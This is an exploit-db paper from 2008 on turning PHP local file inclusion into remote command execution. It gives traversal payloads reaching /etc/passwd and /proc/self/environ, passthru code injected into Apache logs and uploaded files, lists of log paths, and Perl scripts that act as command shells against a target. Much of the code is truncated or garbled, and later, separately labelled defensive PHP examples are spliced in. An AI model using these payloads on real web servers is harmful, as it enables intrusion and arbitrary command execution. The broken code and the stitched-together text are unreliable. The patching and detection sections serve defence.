1 de 21
https://www.exploit-db.com/papers/12992/
|=--------------------------------------------------------------------=|
|=-------------=[ LFI to RCE Exploit with Perl Script ]=--------------=|
|=------------------------=[ 7 December 2008 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title  : LFI to RCE Exploit with Perl Script
Author :
Team   : CWH Underground
Date   : 2008-12-07
##########
Contents
##########
[0x00] - Introduction
[0x01] - File Inclusion (RFI/LFI)
[0x01a] - How the attack works for Remote File Inclusion [RFI]
[0x01b] - How the attack works for Local File Inclusion [LFI]
[0x01c] - Vulnerable PHP Function for File Inclusion
[0x02] - Local File Inclusion To Remote Command Execution [LFI <> RCE]
[0x02a] - LFI <> RCE via Apache Log Injection
14/05/2016 11:28 a. m.
#######################
[0x00] - Introduction
#######################
Welcome reader, this paper is a short attempt at documenting a practical technique
we have been working on. It guides the reader through the process of exploiting a website
via File Inclusion (RFI/LFI) and shows how to write your own exploit script in Perl.
This paper is divided into 7 sections, but only sections 0x01 to 0x05 are technical.
In section 0x01 we talk about the general concept of attacking via File Inclusion.
In section 0x02 we give the details of how to execute arbitrary commands via Local File Inclusion
with each approach. In section 0x03 we present the basic commands needed to create an HTTP transaction
with Perl, with some examples of how to use them. In section 0x04 we assemble the knowledge from
sections 0x01 to 0x03 in order to create our own exploit that executes commands on the target system
via Local File Inclusion. Finally, in section 0x05 we suggest some methods to protect
your system from File Inclusion attacks.
###################################
[0x01] - File Inclusion (RFI/LFI)
###################################
In a File Inclusion attack, attackers run their own code on a vulnerable website.
The attack works by importing code into a program, taking advantage of the unenforced
and unchecked assumptions the program makes about its inputs. If attackers can get
their own malicious code included by a web page, it is possible to "convince" a PHP script to include
a remote file instead of the presumably trusted file from the local file system.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - How the attack works for Remote File Inclusion [RFI]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Remote File Inclusion, known as RFI, is a technique to attack a website by
injecting a PHP script into the target website: the site is made to include an "external" file (a PHP shell).
For instance, a piece of vulnerable PHP code would look like this:
[code]---------------------------------------------------------------------------------
<?php
$file = $_GET['page'];
include($file . ".php");
?>
[End code]--------------------------------------------------------------------------------
The code does not perform any checks on the content of the $page variable, so it is easy
to make the web page include our own file (a PHP shell), like this:
[code]---------------------------------------------------------------------------------
<?php
$file = "http://www.cwh.org/c99.php?";   // value of $_GET['page']
include($file . ".php");                 // includes http://www.cwh.org/c99.php?.php
?>
[End code]--------------------------------------------------------------------------------
** We put "?" at the end of the URL. This makes the script fetch the intended file,
with the appended string as a parameter (which is ignored by the attacker's script) **
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - How the attack works for Local File Inclusion [LFI]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LFI stands for Local File Inclusion. It originates from including "internal" files, i.e. files
on the local file system. Used carelessly, this leads to an LFI vulnerability. On Linux this method
is often used to read "/etc/passwd" and sometimes "/etc/shadow".
For instance, a piece of vulnerable PHP code would look like this:
[URL] http://www.hackme.com/index.php?template=cwh
[code #1]------------------------------------------------------------------------------
<?php
$template = $_GET['template'];
include("/" . $template . ".php");   // <-- Vulnerable !!
?>
[End code]-----------------------------------------------------------------------------
[URL] http://www.hackme.com/index.php?template=../../../../etc/passwd%00
[code #2]------------------------------------------------------------------------------
<?php
$template = $_GET['template'];
include("/../../../../etc/passwd%00.php");   // what the include() call becomes
?>
[End code]-----------------------------------------------------------------------------
** Notice %00 (Null CHAR) will ignore everything that comes after %00 (the .php suffix) **
** Notice ../../../ will traverse the path up to the root and go to /etc/passwd **
Another vulnerable pattern (fragment), where the included path is built from the cwh_user cookie:
[code]---------------------------------------------------------------------------------
  topmenu();
  include("manage/admin/main.php");
  foot();
} else {
  topmenu();
  include("manage/" . $HTTP_COOKIE_VARS['cwh_user'] . "/main.php");
}
foot();
[End code]-----------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01c] - Vulnerable PHP Function for File Inclusion
++++++++++++++++++++++++++++++++++++++++++++++++++++++
File Inclusion (RFI/LFI) mostly occurs through functions that developers call with unchecked input:
include()
include_once()
require()
require_once()
fopen()
#######################################################################
[0x02] - Local File Inclusion To Remote Command Execution [LFI<>RCE]
#######################################################################
In this section, we describe using LFI in another way besides reading files (such as
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
): injecting PHP code
into the Apache log, the process environment or other files, and then including that file. This method is called "Remote Code Execution
(RCE)".
+++++++++++++++++++++++++++++++++++++
[0x02a] - LFI <> RCE via Apache Log
+++++++++++++++++++++++++++++++++++++
The malicious HTTP request must end up in the Apache logs. By their intrinsic nature, log files contain
data that is driven by users. A request looks like this:
[Telnet]--------------------------------------------------------------
>telnet www.hackme.com 80
[End log]------------------------------------------------------------------------------
If we want to run arbitrary commands on the target system, we must inject PHP code via an
HTTP request, like <?passthru($_GET[cmd])?>. After that, the log files will contain the malicious code:
[Malicious HTTP Request via Telnet]----------------------------------------------------
>telnet www.hackme.com 80
[End log]-------------------------------------------------------------------------------
Now we can use the LFI vuln to run arbitrary commands by finding out where the logs are stored.
Go to the LFI vuln path:
[URL] www.hackme.com/index.php?p=../../apache/logs/access.log
(You can see that ../../ traverses to the Apache access log)
on line 457
That's great !! We have already injected code into the log files. Now run arbitrary commands.
If instead we had requested "www.hackme.com/cwh/<? passthru($_GET[cmd]) ?>" from a browser, the log file would show the request in URL-encoded format:
[Logfiles - access.log]----------------------------------------------------------------
......
"GET /cwh/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 200 1958 <-- Not work for Inject
......
[End log]------------------------------------------------------------------------------
It won't work for RCE because the browser automatically encodes special characters
(URL encoding), and it is the encoded request that gets written to the log file (access.log).
So we must inject the malicious code via Telnet, Netcat or a Perl script, so that the request is not encoded.
The error log is written when the requested file does not exist. Thus we can inject code there too:
[Logfiles - error.log]-----------------------------------------------------------------
[Sat Dec 06 15:12:56 2008] [error] [client 127.0.0.1] (20024)The given path
[End log]------------------------------------------------------------------------------
Bingo !! We can inject code through error.log. The next example shows injecting code
into the "referer":
[Logfiles - error.log]-----------------------------------------------------------------
......
[End log]-------------------------------------------------------------------------------
From the log, an attacker can inject malicious code into the "referer", and error.log will be written with the
evil code. However, injecting into access.log is easier than into error.log.
[Logfiles - common locations]----------------------------------------------------------
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
[End log]-------------------------------------------------------------------------------
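From the defender's side, the same property that makes log poisoning work (user-controlled data lands in access.log) makes it detectable. The following is an added example, not code from the paper: it parses Apache combined-format lines and flags PHP code in the request line, Referer or User-Agent; the sample log lines and IP addresses are constructed.

```php
<?php
// Added example, not part of the original paper: scan Apache "combined" log
// lines for PHP code carried in the user-controlled fields (request line,
// Referer, User-Agent). These are the fields the log poisoning above writes
// to, so they are where a defender looks for it. Sample lines are constructed.

// Apache combined log format:
//   host ident user [time] "request" status bytes "referer" "user-agent"
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';

// True when a field carries a PHP open tag or a command-execution call.
// The field is percent-decoded first, so a browser-encoded "%3C?" is caught
// as well as the raw "<?" that a telnet/netcat/socket request leaves behind.
function suspicious_php(string $field): bool
{
    $decoded = rawurldecode($field);
    return preg_match('/<\?(?!xml)/i', $decoded) === 1
        || preg_match('/\b(passthru|system|shell_exec|exec|popen|eval)\s*\(/i', $decoded) === 1;
}

// One finding per suspicious field:
//   ['line' => n, 'client' => ip, 'field' => request|referer|user_agent]
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        if (preg_match(COMBINED_RE, $line, $m) !== 1) {
            continue;                          // not a combined-format entry
        }
        $fields = ['request' => $m[3], 'referer' => $m[6], 'user_agent' => $m[7]];
        foreach ($fields as $name => $value) {
            if (suspicious_php($value)) {
                $findings[] = ['line' => $n + 1, 'client' => $m[1], 'field' => $name];
            }
        }
    }
    return $findings;
}

// Constructed sample: benign traffic, a raw injection in the request path,
// one in the User-Agent, and a browser-encoded attempt (still an attempt,
// even though the paper notes it will not execute).
$sample = [
    '203.0.113.5 - - [06/Dec/2008:15:12:56 +0700] "GET /index.php?page=home HTTP/1.1" 200 1958 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Dec/2008:15:12:57 +0700] "GET /cwh/<?passthru($_GET[cmd])?> HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2008:15:13:01 +0700] "GET /index.php?page=home HTTP/1.1" 200 1958 "-" "<?passthru($_GET[cmd])?>"',
    '203.0.113.9 - - [06/Dec/2008:15:13:05 +0700] "GET /cwh/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 200 1958 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [06/Dec/2008:15:14:00 +0700] "GET /about.php HTTP/1.1" 200 512 "http://example.net/" "Mozilla/5.0"',
];

foreach (scan_log($sample) as $f) {
    printf("line %d: PHP code in %s from %s\n", $f['line'], $f['field'], $f['client']);
}
```

Pair this with a check that the web server user can read the log directory at all: if the log files are unreadable by the PHP process, a poisoned log cannot be included regardless of what it contains.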
++++++++++++++++++++++++++++++++++++++++++
[0x02b] - LFI <> RCE via Process Environ
++++++++++++++++++++++++++++++++++++++++++
When we request a PHP page, a new process is created. In *nix systems, each process
has its own /proc entry. /proc/self/ is a static path: a symbolic link to the entry of the process
that reads it, which contains useful information. If we inject malicious code into /proc/self/environ, we
can run arbitrary commands on the target via LFI.
In the Firefox browser, we use the "User Agent Switcher" add-on, which lets you specify your user agent
manually, or we use a Perl script to set a user agent containing the malicious code (see next chapter).
For instance, a piece of /proc/self/environ would look like this:
[code]---------------------------------------------------------------------------------
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
[End code]------------------------------------------------------------------------------
And after injecting the code through the user agent:
[code]---------------------------------------------------------------------------------
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
<?passthru($_GET[cmd])?> HTTP_KEEP_ALIVE=300
...
[End code]------------------------------------------------------------------------------
** Notice **
We don't recommend this method, because the code must be injected and run immediately: the environment only lives for the current request.
++++++++++++++++++++++++++++++++++++++
[0x02c] - LFI <> RCE via Other Files
++++++++++++++++++++++++++++++++++++++
We saw vulnerabilities in old versions of FCKEditor (www.milw0rm.com/exploits/1484)
that allow many file extensions to be uploaded; in some versions we can upload an extension not
specified in the FCKEditor configuration. If the site also has a Local File Inclusion
vulnerability, we can inject malicious code (<?passthru($_GET[cmd])?>) into the uploaded file and include it:
www.hackme.com/userfiles/upload/shell.cwh
www.hackme.com/index.php?p=./userfiles/upload/shell.cwh%00&cmd=ls -la
Many websites in the world allow uploading image files (jpg/gif/bmp/...), and most of them check only the extension
(.jpg/.gif/...), so they are vulnerable !! If an attacker injects malicious code into an image file (maybe by embedding it
in a JPEG file, or by manually changing the file extension to an image extension) and uploads it to the target server, the LFI
technique is used to traverse to the uploaded file and include it.
##########################################################
[0x03] - Fundamental of Perl Library for Exploit Website
##########################################################
In this section, we will talk about the fundamental Perl commands needed to send HTTP
packets to a server.
They play a significant role in writing exploits. We recommend reading this section before stepping to the
next section.
But if you are familiar with Socket and LWP, you can skip this section. All commands mentioned in this
section will be
++++++++++++++++++++++++++++++++++
A socket is a connection between our PC
and a remote server that we use to send a manipulated request to the server. The information we need to create
a socket is the protocol, server address, server port and data. In Perl, we use the IO::Socket library
to create a socket.
For example, if we want to create a socket to port 80 on the server IP 192.168.0.111 with the TCP
protocol,
[End code]-----------------------------------------------------------------------------
When we want to send an HTTP request through this socket, we can use this syntax:
[code]---------------------------------------------------------------------------------
print $socket $data;
[End code]-----------------------------------------------------------------------------
After finishing with the socket, we have to close it with this syntax:
[code]---------------------------------------------------------------------------------
close($socket);
[End code]------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Introduction to Library for WWW in Perl (LWP)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LWP is a set of Perl modules designed to handle sending HTTP requests. Usually we use this library in steps:
2: Send the HTTP request to the server with LWP::UserAgent and obtain the HTTP response as an HTTP::Response object.
[code]---------------------------------------------------------------------------------
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
[code]---------------------------------------------------------------------------------
print $response->content;                ## response content
print $response->headers->as_string;     ## response header
[End code]-----------------------------------------------------------------------------
If we group all the code together to show the header and content of the HTTP transaction, we can do the
following:
[code]---------------------------------------------------------------------------------
use LWP;
use HTTP::Request;
$request = HTTP::Request->new(GET => "http://192.168.0.111/index.php");
$request->header(User_Agent => "Mozilla 2.0");
$ua = LWP::UserAgent->new();
$response = $ua->request($request);      ## send the request, get an HTTP::Response
print $response->content;
[End code]------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Condition to use Socket or LWP
++++++++++++++++++++++++++++++++++++++++++
As you can see above, both Socket and LWP can send an HTTP request to the server. We use a raw socket when:
- We do not want the HTTP response. (Only inject an HTTP request packet into the server.)
- We do not want the HTTP request to be encoded. (If we send a GET with LWP, the HTTP request
######################################################
[0x04] - Writing LFI <> RCE Exploit with Perl Script
######################################################
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04a] - Perl Exploit to Injecting code into Target
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We can inject our PHP code into the server in many ways, as mentioned above. The rest that we have to work on
is to create a Perl script that sends the malicious request; we will use a socket for this part.
Before writing the Perl script, we have to know which file we will inject code into and how to do
that.
Log files are written when there is a request to a file on the server. Thus we can manipulate
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04b] - Perl Exploit to Executing injected code on Target
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
As in the previous section, we can inject malicious code into some files on the server with the example
code. In this section, we will show how to create a script to execute our code on the server. So we have to bring in
the concept from section 0x03b about the LWP library.
(We choose to use LWP because we need the HTTP response to show the result of executing our code.)
[+] Execute code from logfile
[code]---------------------------------------------------------------------------------
use LWP;
use HTTP::Request;
$logfile = "../../../../var/log/httpd/access.log";
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
while($cmd !~ "exit")
{
$content = "";
/lfi.php?file=".$logfile."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
[+] Execute code from uploaded file
[code]---------------------------------------------------------------------------------
use LWP;
use HTTP::Request;
$uploadedfile = "../../../path/to/uploaded/file/shell.cwh";
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
$content = "";
/lfi.php?file=".$uploadedfile."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
[+] Execute code from /proc/self/environ
[code]---------------------------------------------------------------------------------
use LWP;
use HTTP::Request;
$procenviron = "../../../../../../proc/self/environ";
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
$content = "";
/lfi.php?file=".$procenviron."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
Finally, as you can see from the three codes above, the code that loops to execute commands is
the same.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
In order to execute code from the logfile, we have a problem: we do not know the exact
path of the logfile. So we have to find the path by looping through the feasible paths that we have and see which file contains
the word "cwhunderground", as injected in the previous example code.
Simple Code for LFI <> RCE Exploit:
[code]---------------------------------------------------------------------------------
use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;
$log="../";
@apache=(
"../../../../../var/log/httpd/access_log",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../logs/access.log",
"../../logs/access.log",
"../../../logs/access.log",
"../../../../logs/access.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);
print "
print "==========================================\n";
if (@ARGV < 2)
{
$host=$ARGV[0];
$path=$ARGV[1];
if ( $host
=~
passthru(\$_GET[cmd]);?>";
!~
foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog."%00";
if($info =~ /cwhunderground/)
$shell= $host.$path.$log."%00&cmd=$cmd";
if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
{print $1;}
[End code]------------------------------------------------------------------------------
########################################
[0x05] - How to protect File Inclusion
########################################
- Consider implementing a chroot jail
// Vulnerable Code
[code]---------------------------------------------------------------------------------
<?php
$file = $_GET['page'];
include($file);
?>
[End code]------------------------------------------------------------------------------
// #1 Patching Code !!
[code]---------------------------------------------------------------------------------
<?php
include "./new.php";   // the included file is fixed, not taken from the request
?>
[End code]------------------------------------------------------------------------------
// #2 Patching Code !!
[code]---------------------------------------------------------------------------------
<?php
$file = $_GET['page'];
?>
[End code]------------------------------------------------------------------------------
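Where the page must stay selectable, the second patch is usually completed with an allowlist. The following is an added example, not the paper's code: the request value is only a key into a fixed map, so traversal, null bytes, URLs and uploaded files never reach include(). The page names, file paths and the open_basedir value are assumptions.

```php
<?php
// Added example, not the paper's code: an allowlist for the ?page= parameter.
// The request value is only ever used as a key into a fixed map of files the
// application intends to serve, so it never reaches include() as a path.
// Traversal (../), null bytes (%00), URLs and uploaded files are all rejected
// by the same exact-match check. Page names and file paths are assumptions.

const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Map a user-supplied page name to an allowlisted relative path,
// or null when it is not in the map. No normalisation of the input:
// the key must match exactly.
function resolve_page(?string $name): ?string
{
    if ($name === null) {
        return PAGES['home'];                 // default page
    }
    return array_key_exists($name, PAGES) ? PAGES[$name] : null;
}

// Include the resolved page, failing closed with a generic 404 otherwise.
// $base_dir is the directory the PAGES entries are relative to; it comes
// from the application, never from the request.
function render_page(string $base_dir, ?string $name): void
{
    $relative = resolve_page($name);
    if ($relative === null) {
        http_response_code(404);
        error_log('rejected page parameter: ' . var_export($name, true));
        echo 'Page not found';
        return;
    }
    include $base_dir . '/' . $relative;
}

// Defence in depth at the server level (php.ini), independent of this code:
//   allow_url_include = Off        ; no http:// includes (the RFI case)
//   open_basedir = /var/www/site   ; confines file access (example path)

// Self-check with constructed inputs of the kinds shown in this paper.
$rejected = [
    '../../../../etc/passwd%00',
    "../../../../etc/passwd\0",
    '../../apache/logs/access.log',
    '../../../../../../proc/self/environ',
    './userfiles/upload/shell.cwh%00',
    'http://www.cwh.org/c99.php?',
    'home/../home',
    '',
];
foreach ($rejected as $bad) {
    assert(resolve_page($bad) === null);
}
assert(resolve_page('about') === 'pages/about.php');
assert(resolve_page(null) === 'pages/home.php');

if (PHP_SAPI !== 'cli') {
    render_page(__DIR__, $_GET['page'] ?? null);
}
```

Run it from the command line to execute the self-checks; under a web server the same file serves only the three mapped pages.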
#####################
[0x06] - References
#####################
[1] http://en.wikipedia.org/wiki/Remote_File_Inclusion
[2] http://cwe.mitre.org/data/definitions/98.html
[5] www.owasp.org/index.php/PHP_Top_5
[6] www.milw0rm.com
####################
[0x07] - Greetz To
####################
Greetz
----------------------------------------------------
This paper is written for educational purposes only. The authors are not responsible for any damage
originating from using this paper with the wrong objective. If you want to use this knowledge on other
people's systems,
# milw0rm.com [2008-12-08]